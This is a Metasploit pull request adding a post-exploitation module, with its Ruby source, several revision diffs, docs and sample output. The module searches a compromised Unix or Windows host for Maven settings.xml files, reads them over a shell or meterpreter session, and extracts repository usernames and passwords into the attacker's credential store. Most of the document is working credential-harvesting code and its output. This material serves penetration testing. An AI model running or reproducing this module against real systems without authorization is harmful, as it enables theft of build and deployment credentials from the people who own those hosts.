### PR TITLE
Add Maven creds module

### DIFF
--- a/documentation/modules/post/multi/gather/maven_creds.md
+++ b/documentation/modules/post/multi/gather/maven_creds.md
@@ -32,14 +32,12 @@ msf post(maven_creds) > run
 [*]     Id: server-nexus
 [*]     Username: deploynexus
 [*]     Password: password
-[+] Saved credentials to /home/user/.msf4/loot/20170814145812_default_127.0.0.1_maven.credential_351922.txt
 
-msf post(maven_creds) > loot
+msf post(maven_creds) > creds
 
-Loot
-====
+Credentials
+===========
 
-host       service  type                name          content     info                                                                           path
-----       -------  ----                ----          -------     ----                                                                           ----
-127.0.0.1           maven.credentials   settings.xml  text/plain  Maven credentials from /home/user/settings.xml and id server-nexus             /home/user/.msf4/loot/20170814145812_default_127.0.0.1_maven.credential_351922.txt
-
+host  origin  service  public          private     realm           private_type
+----  ------  -------  ------          -------     -----           ------------
+                       deploynexus     password    server-nexus    Password

--- a/documentation/modules/post/multi/gather/maven_creds.md
+++ b/documentation/modules/post/multi/gather/maven_creds.md
@@ -1,0 +1,45 @@
+## Vulnerable Application
+
+[Maven](https://maven.apache.org/) a software project management.
+This module seeks all settings.xml (Maven configuration file) on the target file system to extract credentials from them.
+
+This module was successfully tested against:
+
+- Ubuntu 14.04 and Maven 3.0.5
+- Debian 9 and Maven 3.0.5
+
+## Verification Steps
+
+  1. Get a `shell` or `meterpreter` session on some host.
+  2. Do: ```use post/multi/gather/maven_creds```
+  3. Do: ```set SESSION [SESSION_ID]```
+  4. Do: ```run```
+  5. If the system has readable configuration files (settings.xml) containing username and passwords, they will be printed out.
+
+## Scenarios
+
+### Ubuntu 14.04 and Maven version 3.0.5
+
+```
+msf post(maven_creds) > run
+
+[*] Finding user directories
+[*] Unix OS detected
+[*] Looting 19 files
+[*] Downloading /home/user/settings.xml
+[*] Reading settings.xml file from /home/user/settings.xml
+[*] Collected the following credentials:
+[*]     Id: server-nexus
+[*]     Username: deploynexus
+[*]     Password: password
+[+] Saved credentials to /home/user/.msf4/loot/20170814145812_default_127.0.0.1_maven.credential_351922.txt
+
+msf post(maven_creds) > loot
+
+Loot
+====
+
+host       service  type                name          content     info                                                                           path
+----       -------  ----                ----          -------     ----                                                                           ----
+127.0.0.1           maven.credentials   settings.xml  text/plain  Maven credentials from /home/user/settings.xml and id server-nexus             /home/user/.msf4/loot/20170814145812_default_127.0.0.1_maven.credential_351922.txt
+

--- a/documentation/modules/post/multi/gather/maven_creds.md
+++ b/documentation/modules/post/multi/gather/maven_creds.md
@@ -2,6 +2,8 @@
 
 [Maven](https://maven.apache.org/) a software project management.
 This module seeks all settings.xml (Maven configuration file) on the target file system to extract credentials from them.
+Credentials are store in the <server> tag ; the module also tries to cross the identifier found with the <mirror> or
+<repository> tag in order to find the full realm the credentials belong to.
 
 This module was successfully tested against:
 
@@ -29,15 +31,34 @@ msf post(maven_creds) > run
 [*] Downloading /home/user/settings.xml
 [*] Reading settings.xml file from /home/user/settings.xml
 [*] Collected the following credentials:
-[*]     Id: server-nexus
-[*]     Username: deploynexus
-[*]     Password: password
+[*]     Id: server-nexus-dev
+[*]     Username: deploynexus-dev
+[*]     Password: password-dev
+[*] Try to find url from id...
+[*] No url found, id will be set as realm
+
+[*] Collected the following credentials:
+[*]     Id: server-nexus-int
+[*]     Username: deploynexus-int
+[*]     Password: password-int
+[*] Try to find url from id...
+[*] Found url in mirror : http://www.myhost.com/int
+
+[*] Collected the following credentials:
+[*]     Id: server-nexus-prd
+[*]     Username: deploynexus-prd
+[*]     Password: password-prd
+[*] Try to find url from id...
+[*] Found url in repository : http://www.myhost.com/prd
+
 
 msf post(maven_creds) > creds
 
 Credentials
 ===========
 
-host  origin  service  public          private     realm           private_type
-----  ------  -------  ------          -------     -----           ------------
-                       deploynexus     password    server-nexus    Password
+host  origin  service  public              private         realm                        private_type
+----  ------  -------  ------              -------         -----                        ------------
+                       deploynexus-dev     password-dev    server-nexus-dev             Password
+                       deploynexus-int     password-int    http://www.myhost.com/int    Password
+                       deploynexus-prd     password-prd    http://www.myhost.com/prd    Password

--- a/documentation/modules/post/multi/gather/maven_creds.md
+++ b/documentation/modules/post/multi/gather/maven_creds.md
@@ -5,8 +5,8 @@ This module seeks all settings.xml (Maven configuration file) on the target file
 
 This module was successfully tested against:
 
-- Ubuntu 14.04 and Maven 3.0.5
-- Debian 9 and Maven 3.0.5
+- Ubuntu 14.04 and Maven 3.0.5 with shell and meterpreter as session type
+- Debian 9 and Maven 3.0.5 with shell and meterpreter as session type
 
 ## Verification Steps
 

--- a/modules/post/multi/gather/maven_creds.rb
+++ b/modules/post/multi/gather/maven_creds.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Post
 
   def gathernix
     print_status("Unix OS detected")
-    files = cmd_exec('locatte settings.xml').split("\n")
+    files = cmd_exec('locate settings.xml').split("\n")
     # Handle case where locate does not exist (error is returned in first element)
     if files.length == 1 && !directory?(files.first)
       files = []

--- a/modules/post/multi/gather/maven_creds.rb
+++ b/modules/post/multi/gather/maven_creds.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Post
       when 'unix', 'linux', 'bsd', 'osx'
         files = gathernix
       else
-        print_error("Incompatible platform.")
+        print_error("Incompatible platform")
     end
     if files.nil? || files.empty?
       print_error("No settings.xml file found")
@@ -97,6 +97,7 @@ class MetasploitModule < Msf::Post
 
       print_status("Try to find url from id...")
       realm = ""
+
       xml_doc.xpath("//mirror[id = '#{id}']").each do |mirror|
         realm = mirror.xpath("url").text
         print_status("Found url in mirror : #{realm}")

--- a/modules/post/multi/gather/maven_creds.rb
+++ b/modules/post/multi/gather/maven_creds.rb
@@ -26,7 +26,25 @@ class MetasploitModule < Msf::Post
 
   def gathernix
     print_status("Unix OS detected")
-    return cmd_exec('locate settings.xml').split("\n")
+    files = cmd_exec('locatte settings.xml').split("\n")
+    # Handle case where locate does not exist (error is returned in first element)
+    if files.length == 1 && !directory?(files.first)
+      files = []
+      paths = enum_user_directories.map {|d| d}
+      if paths.nil? || paths.empty?
+        print_error("No users directory found")
+        return
+      end
+      paths.each do |path|
+        path.chomp!
+        file = "settings.xml"
+        target = "#{path}/#{file}"
+        if file? target
+          files.push(target)
+        end
+      end
+    end
+    return files
   end
 
   def gatherwin
@@ -44,7 +62,7 @@ class MetasploitModule < Msf::Post
         files = gathernix
       end
     else
-       printerror('Incompatible session type, sysinfo is not available.')
+       printerror("Incompatible session type, sysinfo is not available.")
        return
     end
     if files.nil? || files.empty?

--- a/modules/post/multi/gather/maven_creds.rb
+++ b/modules/post/multi/gather/maven_creds.rb
@@ -106,10 +106,8 @@ class MetasploitModule < Msf::Post
       print_status("Reading settings.xml file from #{target}")
       data = ""
       if session.type == "shell"
-        type = :shell
         data = session.shell_command("cat #{target}")
       else
-        type = :meterp
         settings = session.fs.file.new("#{target}", "rb")
         until settings.eof?
           data << settings.read

--- a/modules/post/multi/gather/maven_creds.rb
+++ b/modules/post/multi/gather/maven_creds.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Post
       },
       'License'        => MSF_LICENSE,
       'Author'         => ['elenoir'],
-      'Platform'       => %w{ bsd linux osx unix },
+      'Platform'       => %w{ bsd linux osx unix win },
       'SessionTypes'   => ['shell','meterpreter']
     ))
   end
@@ -93,10 +93,21 @@ class MetasploitModule < Msf::Post
       print_status("    Id: %s" % id)
       print_status("    Username: %s" % username)
       print_status("    Password: %s" % password)
-      loot_path = store_loot("maven.credentials", "text/plain", session, "#{username} #{password}",
-          "settings.xml", "Maven credentials from #{target} and id #{id}")
-      print_good("Saved credentials to #{loot_path}")
       print_line("")
+
+      credential_data = {
+          origin_type: :import,
+          module_fullname: self.fullname,
+          filename: target,
+          service_name: 'maven',
+          realm_value: id,
+          realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+          private_type: :password,
+          private_data: password,
+          username: username,
+          workspace_id: myworkspace_id
+      }
+      create_credential(credential_data)
     end
   end
 

--- a/modules/post/multi/gather/maven_creds.rb
+++ b/modules/post/multi/gather/maven_creds.rb
@@ -55,15 +55,13 @@ class MetasploitModule < Msf::Post
   def run
     print_status("Finding user directories")
     files = ""
-    if sysinfo
-      if sysinfo['OS'].include? "Windows"
+    case session.platform
+      when 'windows'
         files = gatherwin
-      else
+      when 'unix', 'linux', 'bsd', 'osx'
         files = gathernix
-      end
-    else
-       printerror("Incompatible session type, sysinfo is not available.")
-       return
+      else
+        print_error("Incompatible platform.")
     end
     if files.nil? || files.empty?
       print_error("No settings.xml file found")

--- a/modules/post/multi/gather/maven_creds.rb
+++ b/modules/post/multi/gather/maven_creds.rb
@@ -1,0 +1,103 @@
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rexml/document'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info={})
+    super( update_info(info,
+      'Name'           => 'Multi Gather Maven Credentials Collection',
+      'Description'    => %q{
+          This module will collect the contents of all users settings.xml on the targeted
+          machine.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => ['elenoir'],
+      'Platform'       => %w{ bsd linux osx unix },
+      'SessionTypes'   => ['shell','meterpreter']
+    ))
+  end
+
+  def gathernix
+    print_status("Unix OS detected")
+    return cmd_exec('locate settings.xml').split("\n")
+  end
+
+  def gatherwin
+    print_status("Windows OS detected")
+    return cmd_exec('cd\ && dir settings.xml /b /s').split("\n")
+  end
+
+  def run
+    print_status("Finding user directories")
+    files = ""
+    if sysinfo
+      if sysinfo['OS'].include? "Windows"
+        files = gatherwin
+      else
+        files = gathernix
+      end
+    else
+       printerror('Incompatible session type, sysinfo is not available.')
+       return
+    end
+    if files.nil? || files.empty?
+      print_error("No settings.xml file found")
+      return
+    end
+    download_loot(files)
+  end
+
+  def download_loot(files)
+    print_status("Looting #{files.count} files")
+    files.each do |target|
+      target.chomp!
+      if file? target
+        print_status("Downloading #{target}")
+        extract(target)
+      end
+    end
+  end
+
+  def parse_settings(target, data)
+    doc = REXML::Document.new(data).root
+
+    doc.elements.each("servers/server") do |sub|
+      id = sub.elements['id'].text rescue "<unknown>"
+      username = sub.elements['username'].text rescue "<unknown>"
+      password = sub.elements['password'].text rescue "<unknown>"
+
+      print_status("Collected the following credentials:")
+      print_status("    Id: %s" % id)
+      print_status("    Username: %s" % username)
+      print_status("    Password: %s" % password)
+      loot_path = store_loot("maven.credentials", "text/plain", session, "#{username} #{password}",
+          "settings.xml", "Maven credentials from #{target} and id #{id}")
+      print_good("Saved credentials to #{loot_path}")
+      print_line("")
+    end
+  end
+
+  def extract(target)
+      print_status("Reading settings.xml file from #{target}")
+      data = ""
+      if session.type == "shell"
+        type = :shell
+        data = session.shell_command("cat #{target}")
+      else
+        type = :meterp
+        settings = session.fs.file.new("#{target}", "rb")
+        until settings.eof?
+          data << settings.read
+        end
+      end
+
+      parse_settings(target, data)
+  end
+end


### PR DESCRIPTION
Some Artifactory or Nexus credentials are often stored in the Maven settings.xml configuration file.
Example in a settings.xml : 
```xml
<server>
  <id>server-nexus-snapshot</id>
  <username>deploytonexus</username>
  <password>password</password>
</server>
```

This allows application to reference this server and deploy file automatically to it.
This modules scans all settings.xml on the file system, gathers these credentials and store them as loot.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use use post/multi/gather/maven_creds`
- [x] `set SESSION <id>`
- [x] `run`

## Output example

> Finding user directories
Unix OS detected
Looting 15 files
Downloading /home/user/settings.xml
Reading settings.xml file from /home/user/settings.xml
Collected the following credentials:
     Id: server-nexus-snapshot
     Username: deploytonexus
     Password: password
Saved credentials to /home/user/.msf4/loot/20170814145812_default_127.0.0.1_maven.credential_408780.txt

## Loot output 

> **msf** post(maven_creds) > loot
**Host** : 127.0.0.1
**Service type** : maven.credentials
**Name** : settings.xml
**Content** : text/plain
**Info** : Maven credentials from /home/user/settings.xml and id server-nexus-snapshot
**Path** :  /home/user/.msf4/loot/20170814145812_default_127.0.0.1_maven.credential_351922.txt